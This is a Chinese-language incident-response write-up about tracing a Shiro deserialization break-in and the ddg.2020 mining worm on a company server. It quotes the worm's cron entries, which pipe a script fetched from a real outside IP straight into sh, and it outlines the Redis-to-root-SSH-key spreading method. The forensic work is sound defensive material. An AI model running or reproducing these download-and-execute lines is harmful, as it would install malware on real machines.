背景

某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞，可以直接GetShell。出於做安全的謹慎，馬上出現場應急，確認漏洞。該漏洞存在在cookie字段中的rememberMe字段中，可以RCE

漏洞應急

來到現場後，發現已經升級了，漏洞確認修復完成，只能查看以前的攻擊痕跡。

查看賬號情況

首先查看賬戶文件/etc/passwd，修改時間和內容沒有什麽問題

stat /etc/passwd 
cat /etc/passwd

查看文件情況

查看最近修改過的文件沒看到特殊異常

ls -alst / -m -10 -name *

查看進程

查看進程

ps aux 

看到異常 perl nc2.pl 後面參數跟著一個燈塔國地址，馬上想到是反彈的shell，查問漏洞檢測者，果真是，確認無害後kill進程。

查看網絡連接

netstat -anop | grep tcp

發現服務器對外連接很多22端口，覺得異常，服務器主動對外發起連接22端口，很少見，詢問業務也沒有這類業務。看相關進程號，查看進程名ddg.2020。明顯是一個礦馬，經排查服務器上還啟動redis和memcached。都是未授權訪問。目測，是對外發起6379未授權漏洞的利用，寫了root下的id_rsa.pub然後嘗試22登錄，看下自己的root下的.sshd，果真有id_rsa.pub不正常，因為都不適用root登錄遂刪除。查看進程目錄。/tmp下面的，沒有這個文件樣板，全盤搜，只有ddg.2020.db沒有ddg.2020，隨機google，發現該樣本會刪除自己的文件，並啟動定時任務去下載自己。

sudo -i
crontab -e

沒有發現問題，還有一個地方

cat /var/spool/cron/crontabs/root

果然看到

curl -fsSL https://218.248.40.228:8443/i.sh | sh
wget -g -O -http://218.248.40.228:8443/i.sh | sh

馬上配置阻斷

查看進程運行時間對應的操作

history #只有四百多條，很明顯不對
who /var/log/wtmp 
last
last /var/run/utmp #

發現那天的登錄日誌被清理。
查看VPC內其他主機，都不存在該蠕蟲，那麽肯定就是通過getshell打進來，然後種了樣本之後離開的。

總結

異常的發現在於明顯區別於正常使用用途的網絡連接。

應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬（Shiro反序列化漏洞和ddg挖礦木馬）